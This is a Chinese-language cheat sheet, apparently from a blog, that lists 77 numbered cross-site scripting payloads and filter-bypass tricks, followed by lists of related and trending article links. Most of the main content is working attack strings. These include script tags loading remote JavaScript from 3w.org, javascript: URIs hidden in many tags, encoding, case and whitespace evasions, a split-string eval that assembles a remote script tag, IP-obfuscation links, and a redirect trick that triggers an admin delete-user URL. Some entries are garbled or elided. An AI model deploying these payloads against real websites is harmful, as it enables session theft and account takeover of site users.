(1)普通的XSS JavaScript注入
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>

(2)IMG标签XSS使用JavaScript命令
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>

(3)IMG标签无分号无引号
<IMG SRC=javascript:alert('XSS')>

(4)IMG标签大小写不敏感
<IMG SRC=JaVaScRiPt:alert('XSS')>

(5)HTML编码(必须有分号)
<IMG SRC=javascript:alert("XSS")>

(6)修正缺陷IMG标签
<IMG """><SCRIPT>alert("XSS")</SCRIPT>">

(7)formCharCode标签(计算器)
<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>

(8)UTF-8的Unicode编码(计算器)
<IMG SRC=jav..省略..S')>

(9)7位的UTF-8的Unicode编码是没有分号的(计算器)
<IMG SRC=jav..省略..S')>

(10)十六进制编码也是没有分号(计算器)
<IMG SRC=java..省略..XSS')>

(11)嵌入式标签,将Javascript分开
<IMG SRC="jav ascript:alert('XSS');">

(12)嵌入式编码标签,将Javascript分开
<IMG SRC="jav ascript:alert('XSS');">

(13)嵌入式换行符
<IMG SRC="jav ascript:alert('XSS');">

(14)嵌入式回车
<IMG SRC="jav ascript:alert('XSS');">

(15)嵌入式多行注入JavaScript,这是XSS极端的例子
<IMG SRC="javascript:alert('XSS')">

(16)解决限制字符(要求同页面)
<script>z='document.'</script>
<script>z=z+'write("'</script>
<script>z=z+'<script'</script>
<script>z=z+' src=ht'</script>
<script>z=z+'tp://ww'</script>
<script>z=z+'w.shell'</script>
<script>z=z+'.net/1.'</script>
<script>z=z+'js></sc'</script>
<script>z=z+'ript>")'</script>
<script>eval_r(z)</script>

(17)空字符
perl -e 'print "<IMG SRC=java\0script:alert(\"XSS\")>";' > out

(18)空字符2,空字符在国内基本没效果.因为没有地方可以利用
perl -e 'print "<SCR\0IPT>alert(\"XSS\")</SCR\0IPT>";' > out

(19)Spaces和meta前的IMG标签
<IMG SRC=" javascript:alert('XSS');">

(20)Non-alpha-non-digit XSS
<SCRIPT/XSS SRC="http://3w.org/XSS/xss.js"></SCRIPT>

(21)Non-alpha-non-digit XSS to 2
<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert("XSS")>

(22)Non-alpha-non-digit XSS to 3
<SCRIPT/SRC="http://3w.org/XSS/xss.js"></SCRIPT>

(23)双开括号
<<SCRIPT>alert("XSS");//<</SCRIPT>

(24)无结束脚本标记(仅火狐等浏览器)
<SCRIPT SRC=http://3w.org/XSS/xss.js?<B>

(25)无结束脚本标记2
<SCRIPT SRC=//3w.org/XSS/xss.js>

(26)半开的HTML/JavaScript XSS
<IMG SRC="javascript:alert('XSS')"

(27)双开角括号
<iframe src=http://3w.org/XSS.html <

(28)无单引号 双引号 分号
<SCRIPT>a=/XSS/
alert(a.source)</SCRIPT>

(29)换码过滤的JavaScript
\";alert('XSS');//

(30)结束Title标签
</TITLE><SCRIPT>alert("XSS");</SCRIPT>

(31)Input Image
<INPUT SRC="javascript:alert('XSS');">

(32)BODY Image
<BODY BACKGROUND="javascript:alert('XSS')">

(33)BODY标签
<BODY('XSS')>

(34)IMG Dynsrc
<IMG DYNSRC="javascript:alert('XSS')">

(35)IMG Lowsrc
<IMG LOWSRC="javascript:alert('XSS')">

(36)BGSOUND
<BGSOUND SRC="javascript:alert('XSS');">

(37)STYLE sheet
<LINK REL="stylesheet" HREF="javascript:alert('XSS');">

(38)远程样式表
<LINK REL="stylesheet" HREF="http://3w.org/xss.css">

(39)List-style-image(列表式)
<STYLE>li {list-style-image: url("javascript:alert('XSS')");}</STYLE><UL><LI>XSS

(40)IMG VBscript
<IMG SRC='vbscript:msgbox("XSS")'></STYLE><UL><LI>XSS

(41)META链接url
<META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:alert('XSS');">

(42)Iframe
<IFRAME SRC="javascript:alert('XSS');"></IFRAME>

(43)Frame
<FRAMESET><FRAME SRC="javascript:alert('XSS');"></FRAMESET>

(44)Table
<TABLE BACKGROUND="javascript:alert('XSS')">

(45)TD
<TABLE><TD BACKGROUND="javascript:alert('XSS')">

(46)DIV background-image
<DIV STYLE="background-image: url(javascript:alert('XSS'))">

(47)DIV background-image后加上额外字符(1-32&34&39&160&8192-8&13&12288&65279)
<DIV STYLE="background-image: url( javascript:alert('XSS'))">

(48)DIV expression
<DIV STYLE="width: expression_r(alert('XSS'));">

(49)STYLE属性分拆表达
<IMG STYLE="xss:expression_r(alert('XSS'))">

(50)匿名STYLE(组成:开角号和一个字母开头)
<XSS STYLE="xss:expression_r(alert('XSS'))">

(51)STYLE background-image
<STYLE>.XSS{background-image:url("javascript:alert('XSS')");}</STYLE><A CLASS=XSS></A>

(52)IMG STYLE方式
exppression(alert("XSS"))'>

(53)STYLE background
<STYLE><STYLE type="text/css">BODY{background:url("javascript:alert('XSS')")}</STYLE>

(54)BASE
<BASE HREF="javascript:alert('XSS');//">

(55)EMBED标签,你可以嵌入FLASH,其中包涵XSS
<EMBED SRC="http://3w.org/XSS/xss.swf" ></EMBED>

(56)在flash中使用ActionScrpt可以混进你XSS的代码
a="get";
b="URL(\"";
c="javascript:";
d="alert('XSS');\")";
eval_r(a+b+c+d);

(57)XML namespace.HTC文件必须和你的XSS载体在一台服务器上
<HTML xmlns:xss>
<?import namespace="xss" implementation="http://3w.org/XSS/xss.htc">
<xss:xss>XSS</xss:xss>
</HTML>

(58)如果过滤了你的JS你可以在图片里添加JS代码来利用
<SCRIPT SRC=""></SCRIPT>

(59)IMG嵌入式命令,可执行任意命令
<IMG SRC="http://www.XXX.com/a.php?a=b">

(60)IMG嵌入式命令(a.jpg在同服务器)
Redirect 302 /a.jpg http://www.XXX.com/admin.asp&deleteuser

(61)绕符号过滤
<SCRIPT a=">" SRC="http://3w.org/xss.js"></SCRIPT>

(62)
<SCRIPT =">" SRC="http://3w.org/xss.js"></SCRIPT>

(63)
<SCRIPT a=">" " SRC="http://3w.org/xss.js"></SCRIPT>

(64)
<SCRIPT "a='>'" SRC="http://3w.org/xss.js"></SCRIPT>

(65)
<SCRIPT a=`>` SRC="http://3w.org/xss.js"></SCRIPT>

(66)
<SCRIPT a=">'>" SRC="http://3w.org/xss.js"></SCRIPT>

(67)
<SCRIPT>document.write("<SCRI");</SCRIPT>PT SRC="http://3w.org/xss.js"></SCRIPT>

(68)URL绕行
<A HREF="http://127.0.0.1/">XSS</A>

(69)URL编码
<A HREF="http://3w.org">XSS</A>

(70)IP十进制
<A HREF="http://3232235521″>XSS</A>

(71)IP十六进制
<A HREF="http://0xc0.0xa8.0×00.0×01″>XSS</A>

(72)IP八进制
<A HREF="http://0300.0250.0000.0001″>XSS</A>

(73)混合编码
<A HREF="http://6 6.000146.0×7.147/"">XSS</A>

(74)节省[http:]
<A HREF="//www.google.com/">XSS</A>

(75)节省[www]
<A HREF="http://google.com/">XSS</A>

(76)绝对点绝对DNS
<A HREF="http://www.google.com./">XSS</A>

(77)javascript链接
<A HREF="javascript:document.location='http://www.google.com/'">XSS</A>

常用 XSS Payload相关推荐

1. Web安全系列（二）：XSS 攻击进阶（初探 XSS Payload）

   什么是 XSS Payload 上一章我谈到了 XSS 攻击的几种分类以及形成的攻击的原理,并举了一些浅显的例子,接下来,我就阐述什么叫做 XSS Payload 以及从攻击者的角度来初探 XSS 攻 ...

2. 终极万能XSS Payload

   前言: 在进行跨站脚本攻击的时候(xss),通常会需要我们通过插入的代码场景构造payload.就比较耗费时间,为了更方便的去测试漏洞,万能XSS payload就出现了 什么是万能XSS paylo ...

3. xss Payload

   来自某牛的网站:http://www.cnblogs.com/b1gstar/p/5783848.html Basic and advanced exploits for XSS proofs and ...

4. 常用xss代码以及绕过

   ​​常规的xss代码      一般打xss就是闪电五连鞭,一下几个代码首选一顿操作就完事儿 "OnMoUsEoVeR=prompt(6)//"><script> ...

5. xss payload大全

   刚好刚才在fuzz一个站的时候用到,就从笔记里抛出来了. code: (1)普通的XSS JavaScript注入 <SCRIPT SRC=http://3w.org/XSS/xss.js> ...

6. xss payload收集

   打开xss之js,我们随意输入然后查看页内原码. 我们输入tmac 复制全文 我们尝试造成闭合,我们尝试造成闭合,输入x'</script><script>alert(docu ...

7. 无需括号的xss payload

   兄弟们,事情是这样的,上周五我不是参加公司的新人训练营吗 可是没想到 糟糕的事情发生在了我身上 这件事情严重影响了我这周的学习与工作 你听我慢慢给你讲 由于疫情原因,这次的训练营只能在室内进行,约定的 ...

8. XSS————2、XSS bypass

   0x00前言 XSS有反射.存储.DOM三种类型,不同类型的xss的危害各不相同,下面做一个简要说明: 数据流向: 反射型:浏览器-->后端-->浏览器 存储型:浏览器-->后端-- ...

9. msf常用payload

   msf作为一款强大的漏洞检测工具,如何生成适用于msf的payload以及如何利用是使用msf的关键,今天就主要记录一下常用的payload以及如何使用.生成payload使用的工具是MSFVenom ...

最新文章

1. JsonMappingException：找不到类型[simple type，class]的合适构造函数：无法从JSON对象实例化
2. arm linux文件传输工具
3. java封装省市区三级json格式,微信开发 使用picker封装省市区三级联动模板
4. python matlablib安装踏坑记
5. 个人作业-Week1
6. ORA-06575: 程序包或函数 NO_VM_DROP_PROC 处于无效状态
7. css3新属性partA
8. LVM 逻辑卷管理（原理概念篇）
9. matlab的输出(命令窗口、fprint函数、disp函数)
10. _crol_和_cror_的使用
11. 我想把生活折腾成自己想要的样子
12. 比特大陆之争终落幕，吴忌寒为爱和平退出？
13. MFC中picture控件如何响应鼠标移动？
14. 蕴含命题遇到的疑惑和解答
15. VMware vSphere6.0 服务器虚拟化部署安装图解(最全，最详细)-搭建的所有步骤
16. string密钥转PrivateKey和PublicKey
17. html中写meta会乱码,网页html代码不可缺少的5个meta标签属性
18. Python3基础教程
19. 酷壳: 程序员技术练级攻略
20. Shell脚本 单引号、双引号和反引号的区别

热门文章

1. 参数估计之 最大似然估计法
2. 传奇人物、NPC、怪物的头顶封号素材(顶戴花翎功能)添加教程
3. Win11连接WiFi后显示“无Internet，安全”
4. linux 备份iphone,备份苹果硬盘的数据
5. AutoSAR实验视频讲解：相关资料下载
6. 高新技术企业认定条件及流程
7. 申办高新技术企业，如何申请高新认定
8. 毕业去哪儿？看这里！神策数据 2023 校园招聘启动啦
9. 【k8s】Unable to restart cluster, will reset it: apiserver healthz异常
10. Vue导出页面为pdf